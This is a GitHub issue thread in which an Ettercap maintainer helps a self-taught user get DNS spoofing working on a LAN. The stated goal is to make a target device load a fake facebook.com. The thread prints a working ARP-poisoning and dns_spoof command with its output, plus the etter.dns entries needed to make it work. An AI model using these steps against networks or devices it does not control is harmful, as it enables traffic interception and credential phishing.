Closed NanduKkd closed 4 years ago
koeppea
commented
4 years ago Hi,
have you tried to uncomment the redir6_commands ?
This bug should be fixed in 0.8.4-rc (master on GitHub).
Please try and feed back if that helped. If not, you might have to replace your distribution provided version of ettercap with a most current version comiled from GitHub source code.
NanduKkd
commented
4 years ago Hi,
have you tried to uncomment the redir6_commands ?
That worked, it didn't crash now!. Thank you for the quick reply. I appreciate it. <3
NanduKkd
commented
4 years ago Hi again, Ettercap didn't crash now, it went ok. But I'm having another problem here. I did everything as written in this tutorial. I have a device connected on my LAN. I am not able to show my version of facebook.com on that device, the original facebook.com shows up. I can't understand why. And I don't know if this might be of any help, but the ettercap's output view showed this when opened:
Lua: no scripts were specified, not starting up!
Thanks!
koeppea
commented
4 years ago I had a look at this tutorial. Its basically not correct. Enabling the redir_command's makes Ettercap just intercepting SSL. But for that, especially in today's world it's quite tricky and has many pitfalls. For that topic I plan a dedicated tutorial video on YouTube and I'm afraid it will get a 30min duration due to all of the things that have to be pointed out.
So basically you don't need to uncomment the redir commands. To redirect your victim to another IP address when it's typing a dns-name, you just edit your etter.dns (I recommend removing all the examples to avoid conflicts with what you want to achieve) and enable the plugin during runtime.
You can test if the DNS spoofing worked, by just pinging the DNS name and check if it tries to ping the spoofed IP. You should also see a message in Ettercap. But mind the local DNS cache that Windows has enabled by default.
Now to Facebook: this is one of the pages that are part of the pre-built list, hardcoded in the browser, that require SSL right from the beginning. If the browser then has cached the HSTS for this site from a previous visit, you must have a valid certificate for that site on your fake webserver, that the victim trusts (basically it has to trust it's signer certificate). See our Wiki article about more info on that.
The LUA message can be ignored. This is just a status message since Ettercap seem been built with the experimental LUA support.
NanduKkd
commented
4 years ago So that not required uncommenting redir_commands part cost me hours!
I will try the way you said and will reply here. And I'm using an Android tablet as the target. I don't know, but I have read that the android stores the local DNS cache for like forever. I'l have to think of that.
And about the SSL, I'll have to learn more. I'm kind of self taught, so I dont know much. The wiki was good though.
About the Youtube video. I don't know if this a good idea, but why don't you do it as two or three parts?
Anyway Thanks! I'm really loving this community thing of Github!
koeppea
commented
4 years ago About the Youtube video. I don't know if this a good idea, but why don't you do it as two or three parts?
Because 0.8.3 and 0.8.4-rc has so many SSL related fixes and improvements, trying to keep up with the pace of the TLS standard and the surrounding technologies like HSTS. But essentially it's just about intercepting an SSL stream. And for that single "requirement" or "task", there is much to say. I will see when I find time to record that.
NanduKkd
commented
4 years ago Hi, I tried that dns spoof plugin, I couldn't work that out.
My etter.dns:
myownfakeserver.com A 203.124.115.1 3600
*.myownfakeserver.com A 203.124.115.1I used a non-existent domain name so that I don't have to worry about the local dns cache problem. I got the IP address by Ping-ing a server of a nearby institution.
I ran Ettercap in text only mode:
# ettercap -T -P dns_spoof -M arp:remote -d -E /192.168.43.1// /192.168.43.245//
ettercap 0.8.3 copyright 2001-2019 Ettercap Development Team
Listening on:
wlan0 -> 90:48:9A:00:66:DF
192.168.43.182/255.255.255.0
fe80::865e:3754:2523:e571/64
2401:4900:22d2:9fc:e7a4:c520:3c1f:1ff7/64
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to EUID 0 EGID 0...
34 plugins
42 protocol dissectors
57 ports monitored
24609 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!
Scanning for merged targets (2 hosts)...
* |==================================================>| 100.00 %
2 hosts added to the hosts list...
Resolving 2 hostnames...
* |==================================================>| 100.00 %
ARP poisoning victims:
GROUP 1 : 192.168.43.1 9C:6B:72:1B:59:27
GROUP 2 : 192.168.43.245 40:A1:08:54:E2:4F
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Activating dns_spoof plugin...
Mon Jun 8 08:36:58 2020 [851766]
40:A1:08:54:E2:4F --> 90:48:9A:00:66:DF
192.168.43.245:0 --> 192.168.43.1:0 | (0)
Mon Jun 8 08:37:18 2020 [47405]
40:A1:08:54:E2:4F --> 90:48:9A:00:66:DF
UDP 192.168.43.245:22816 --> 8.8.8.8:53 | (28)
.............google.com.....
Mon Jun 8 08:37:18 2020 [204931]
9C:6B:72:1B:59:27 --> 90:48:9A:00:66:DF
UDP 8.8.8.8:53 --> 192.168.43.245:22816 | (44)
.............google.com....................nClosing text interface...
Terminating ettercap...
Lua cleanup complete!
ARP poisoner deactivated.
RE-ARPing the victims...
Unified sniffing was stopped.
40:A1:08:54:E2:4F - target 90:48:9A:00:66:DF - attacker 9C:6B:72:1B:59:27 - Defualt gateway
I was able to spoof the domain name, I think. I was using spaces instead of tabs in etter.dns file, my mistake. Now, when I go to the browser from the target device and type myownfakeserver.com, my ettercap console shows that the address is being spoofed. But I'm having another problem now. The ettercap console does show that the ip address is being spoofed, but the browser just shows the DNS_PROBE_FINISHED_NXDOMAIN error. I don't understand why. Then I changed the ip address in etter.dns to the attacker's ip address and started an apache server and ran it. This time too, the NXDDOMAIN error showed up. Is it because of any certificate problems?
NanduKkd
commented
4 years ago This tutorial also says that we should uncomment the redir_commands to do DNS spoofing. I first thought that that was kali's official site! I should have checked the domain address carefully.
koeppea
commented
4 years ago @NanduKkd reg the NXDomain, Can you try the following content of your etter.dns?
myownfakeserver.com A 203.124.115.1 3600
*.myownfakeserver.com A 203.124.115.1
myownfakeserver.com AAAA ::
*.myownfakeserver.com AAAA ::
I double checked the source code. The fields have just to be separated by white-spaces. One or more spaces and/or tabs. When you check the ettercap-0.8.4-rc_debug.log file, you can see how your etter.dns file is parsed. If it's really parsed wrongly, I'd be very interested to get a binary copy (not copy&paste) of your etter.dns file for further analysis.
koeppea
commented
4 years ago Reg. the tutorial, I left a comment that (hopefully) the author correct the incorrectness of it's blog content.
NanduKkd
commented
4 years ago @koeppea Thanks! Sending the blank response for ipv6 did the part! Well most of the tutorials (all those which I've read) available in the net just ignores that part. I ran ettercap again, this time I replaced the separating tabs with white-spaces in the etter.dns file and it worked! You are right. May be I messed up something last time.
Thanks for helping, you guys are really great on that part! I guess you can close this issue now👍
koeppea
commented
4 years ago Closing then....
I uncommented the redir_command "iptables ..." in the config file and then ran ettercap -G. The ettercap window opened and I selected wlan0 and unified sniffing options and when I pressed the accept button, it crashed and showed segmentation fault in the terminal. I can't figure out why. And also, I'm not experienced with kali and ettercap. I don't actually know what kind of details I should specify. If anyone tells me how, I will do that. And excuse me for my poor english too :)